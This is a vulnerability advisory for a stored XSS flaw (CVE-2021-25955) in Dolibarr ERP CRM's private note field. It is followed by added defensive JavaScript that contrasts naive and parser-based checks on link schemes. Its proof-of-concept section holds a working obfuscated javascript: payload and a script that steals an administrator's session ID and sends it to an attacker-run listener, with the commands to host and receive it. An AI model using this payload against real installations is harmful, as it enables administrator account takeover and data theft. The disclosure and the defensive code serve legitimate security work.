CVE-2021-25955
Date: August 15, 2021
Details
The WYSIWYG Editor module of “Dolibarr ERP CRM” is affected by a stored XSS vulnerability that allows low-privileged application users to store malicious scripts in the Private Note field at the “/adherents/note.php?id=1” endpoint. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. In the worst case, the victim who inadvertently triggers the attack is a highly privileged administrator, so the injected script can extract the Session ID, which can lead to full account takeover. Because of a separate vulnerability (Improper Access Control on Private notes), a low-privileged user can update the private notes, which could lead to privilege escalation.
PoC Details
For demonstration purposes we will use two users:
1. “member1” (permissions to “Read members” and “Create/modify members”)
2. “admin” (administrator).
Create a malicious JS file that sends session id to the attacker over a GET request.
Run a PHP Simple Server to host the malicious file.
Run a Python Simple HTTP Server to get the extracted Session ID.
Log in to the application as member1. Go to the My Dashboard option on the left pane and select member1 from the “Latest 5 members” section. Go to the Note option from the navigation bar and edit the public note: provide the payload in the field and capture the request with a web proxy (for example, Burp Suite). Then modify the captured request by changing public to private (in 3 parameters) and forward it.
Log in as the “admin” user and go to the same endpoint; a private note has been created. When the administrator clicks on the private note, the malicious script runs.
The attacker’s Python server receives the administrator’s Session ID. Using that Session ID, the attacker can log in as the administrator.
PoC Code
// Payload:
<a href="j	a	v	asc
ri	pt:var re;x=new XMLHttpRequest;x.onload%0d=function(){var ur='http://192.168.18.37:8090/test.js';$.getScript(ur);};x.open('GET','http://192.168.18.36/');x.send();">Click to Get !!hacked!!</a>
// File (test.js) contents:
var te = /[0-9a-zA-Z]+/gm;
var re;
x=new XMLHttpRequest;
x.onload=function(){
re = this.responseText;
var reg = /Session\sID\S+\s\S+/gm;
console.log(((re.match(reg))[0].match(te))[6]);
var sessionId=((re.match(reg))[0].match(te))[6];
var url = "http://192.168.18.37:9999/" + sessionId;
$.ajax(url);
};
x.open('GET','http://192.168.18.36/admin/system/dolibarr.php', true);
x.withCredentials = true;
x.send(null);
// Command to run the Python Simple http Server to get the extracted Session ID.
python3 -m http.server 9999
// Command to run the PHP Simple Server to host the malicious file.
php -S 192.168.18.37:8090
Affected Environments
2.8.1-13.0.2
Prevention
Upgrade to version 14.0.0
Language: PHP
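The payload above splits the `javascript:` scheme with tab and newline characters. A browser's URL parser discards ASCII tab and newline anywhere in the input and lower-cases the scheme before it decides how to handle the link, so a server-side filter that compares the raw attribute text against the string `javascript:` never sees a match. The following is an added example in JavaScript (Node), not code from Dolibarr or from this advisory: it contrasts that naive string check with one that runs the value through the WHATWG URL parser first and then applies a scheme allowlist. The allowlist, the placeholder base URL and the sample href values are assumptions made for the example.

```javascript
// Added example, not Dolibarr code: validate an href the way the browser will
// interpret it, so a "javascript:" scheme split by tabs or newlines (as in the
// advisory payload) is still recognised and rejected on the server side.

// Schemes a note field may legitimately link to (assumed allowlist).
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

// Base URL used only to resolve relative links; the host is a placeholder.
const BASE = "https://app.example.invalid/";

// Naive check, shown for contrast: it compares the raw attribute text, so a
// scheme with embedded ASCII tabs or newlines never matches the prefix and
// the value is wrongly reported as safe.
function naiveIsSafeHref(href) {
  return !String(href).trim().toLowerCase().startsWith("javascript:");
}

// Hardened check: let the WHATWG URL parser normalise the value first. The
// parser strips ASCII tab and newline anywhere in the input and lower-cases
// the scheme, which is what the browser does when the link is followed.
// Only allowlisted schemes pass; anything unparseable is rejected outright.
function isSafeHref(href) {
  if (typeof href !== "string") return false;
  let parsed;
  try {
    parsed = new URL(href, BASE);
  } catch (e) {
    return false;
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Returns the values the naive check lets through but the parser-based
// check rejects, i.e. the filter bypasses a reviewer would want to see.
function bypassesOfNaiveCheck(hrefs) {
  return hrefs.filter((h) => naiveIsSafeHref(h) && !isSafeHref(h));
}

// Constructed sample values. The second mirrors the advisory's tab-split
// scheme but with a harmless body; the others cover the ordinary cases.
const SAMPLE_HREFS = [
  "https://example.com/members",
  "j\ta\tv\tasc\nri\tpt:alert(1)",
  "JAVASCRIPT:alert(1)",
  "/adherents/note.php?id=1",
  "mailto:member@example.com",
  "data:text/html,<b>x</b>",
];

for (const h of SAMPLE_HREFS) {
  console.log(JSON.stringify(h), "naive:", naiveIsSafeHref(h), "parsed:", isSafeHref(h));
}
console.log("bypasses of the naive check:", bypassesOfNaiveCheck(SAMPLE_HREFS));
```

Run it with `node`. The point carries over to any sanitiser applied to the note field: validate URL-valued attributes after parsing them as the browser will, not by string matching on the stored text, and reject values the parser cannot handle rather than trying to repair them.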
Good to know:

CVSS v3 base metrics

| Metric | Value |
|---|---|
| Base Score | |
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | Low |
| User Interaction (UI) | Required |
| Scope (S) | Changed |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |

CVSS v2 base metrics

| Metric | Value |
|---|---|
| Base Score | |
| Access Vector (AV) | Network |
| Access Complexity (AC) | Medium |
| Authentication (AU) | Single |
| Confidentiality (C) | None |
| Integrity (I) | Partial |
| Availability (A) | None |